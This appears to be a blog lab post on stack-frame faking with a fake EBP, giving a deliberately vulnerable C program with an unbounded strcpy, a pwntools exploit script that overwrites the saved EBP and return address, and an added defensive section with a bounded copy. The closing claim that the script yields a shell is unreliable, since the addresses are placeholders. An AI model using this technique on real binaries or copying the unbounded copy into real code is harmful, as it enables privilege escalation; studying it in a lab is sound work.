strangerRidingCaml

System hacking

Frame Faking and Fake EBP Lab

woddlwoddl 2024. 5. 7. 17:24

In this lab, we will learn how to manipulate stack frames and EBP for privilege escalation.

Lab Activities:

1. Creating Vulnerable C Program:

First, let's create a vulnerable C program with a buffer overflow vulnerability.


  #include <stdio.h>
  #include <string.h>

  void vulnerable_function(char *input) {
      char buffer[64];
      /* Unbounded copy: input longer than 64 bytes overwrites the saved EBP
       * and the return address that sit above the buffer on the stack. */
      strcpy(buffer, input);
  }

  int main(int argc, char *argv[]) {
      if (argc != 2) {
          printf("Usage: %s <input>\n", argv[0]);
          return 1;
      }

      /* The attacker-controlled input arrives as the first command-line argument. */
      vulnerable_function(argv[1]);

      printf("Program executed successfully.\n");
      return 0;
  }
  

Save the above code to a file named vulnerable.c and compile it with the following command (on a 64-bit host, add -m32 so that the resulting binary is 32-bit; the EBP layout and the p32() packing used by the exploit script below assume that):

$ gcc -o vulnerable -fno-stack-protector -z execstack vulnerable.c

2. Writing Exploit Script:

Now, let's write an exploit script in Python using pwntools to manipulate the stack frames and EBP.


  from pwn import *

  # Specify the path to the vulnerable binary
  binary_path = './vulnerable'

  # Address of function to return to
  return_address = 0xdeadbeef  # Example address (change as needed)

  # Offset from the start of buffer to the saved EBP slot
  # (confirm with a debugger: compiler padding and alignment can change it)
  offset = 72

  # Fake EBP value: the saved frame pointer the caller restores on leave/ret
  fake_ebp = 0xdeadbeef  # Example value (change as needed)

  # Craft the payload
  payload = b'A' * offset
  payload += p32(fake_ebp)  # Fake EBP
  payload += p32(return_address)  # Return address

  # vulnerable.c reads its input from argv[1], not stdin, so the payload is
  # passed as a command-line argument (it must therefore contain no NUL bytes)
  p = process([binary_path, payload])
  p.interactive()
  

Explanation of the Python script:

  • We specify the address of the function to return to and the fake EBP value.
  • The payload consists of padding up to the saved EBP slot, followed by the fake EBP value and the return address.
  • We launch the vulnerable binary with the payload as its argument; the overflow in strcpy() overwrites the saved EBP and the return address, which is the frame faking and fake EBP exploit.
  • p.interactive() allows us to interact with the spawned shell.
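The lab's two central facts are that an unbounded strcpy() lets the input run past the buffer into the saved EBP slot, and that the "offset" in step 2 is a property of the compiled frame rather than simply the buffer size. The following program, added here as an example and not part of the original post, shows both from the defender's side: a bounded replacement for the lab's vulnerable_function that can never reach the saved frame pointer, and a measurement of the buffer-to-saved-frame-pointer distance in a 64-byte frame. It assumes a GCC or Clang toolchain (for __builtin_frame_address) and uses a constructed input of repeated 'A' bytes.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64   /* same buffer size as the lab's vulnerable_function */

/* Bounded replacement for the lab's strcpy(buffer, input): copies at most
 * dst_size-1 bytes and always NUL-terminates, so an over-long input can
 * never reach the saved EBP slot or the return address above the buffer.
 * Returns how many input bytes were dropped (0 when the input fits). */
size_t safe_copy(char *dst, size_t dst_size, const char *src) {
    size_t len = strlen(src);
    if (dst_size == 0)
        return len;
    size_t n = (len < dst_size - 1) ? len : dst_size - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return len - n;
}

/* Hardened counterpart of vulnerable_function: same buffer, bounded copy. */
size_t hardened_function(const char *input) {
    char buffer[BUF_SIZE];
    return safe_copy(buffer, sizeof buffer, input);
}

/* Builds a constructed input of input_len 'A' bytes (like the exploit's
 * padding) and reports how many of them the hardened copy discards. */
size_t hardened_demo(size_t input_len) {
    char input[256];
    if (input_len > sizeof input - 1)
        input_len = sizeof input - 1;
    memset(input, 'A', input_len);
    input[input_len] = '\0';
    return hardened_function(input);
}

/* Distance in bytes from the start of a 64-byte local buffer to this frame's
 * saved frame pointer slot: the quantity the exploit script calls "offset".
 * __builtin_frame_address(0) (GCC/Clang) yields the frame pointer, which on
 * x86 points at the saved EBP/RBP with the return address just above it, so
 * the result there is at least 64 and usually larger because of alignment
 * padding. Other ABIs lay the frame out differently, which is exactly why an
 * offset is measured against the real binary rather than assumed. */
ptrdiff_t frame_offset(void) {
    char buffer[BUF_SIZE];
    volatile char *base = buffer;   /* keep the buffer on the stack */
    base[0] = 'A';
    return (char *)__builtin_frame_address(0) - (char *)base;
}

int main(void) {
    printf("bytes dropped for a 100-byte input: %zu\n", hardened_demo(100));
    printf("buffer-to-saved-frame-pointer offset here: %td bytes\n",
           frame_offset());
    return 0;
}
```

Run with the same flags as the lab (with and without -m32) and compare the printed offset: it is the number of padding bytes that would sit before a fake EBP in that build, and it changes with the target and compiler settings, while hardened_function drops the excess bytes regardless of how long the input is.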

3. Exploiting the Vulnerability:

Execute the Python script to exploit the buffer overflow vulnerability:

$ python exploit.py

Once executed, you should have a shell prompt, confirming that the buffer overflow was successfully exploited through frame faking with a fake EBP.
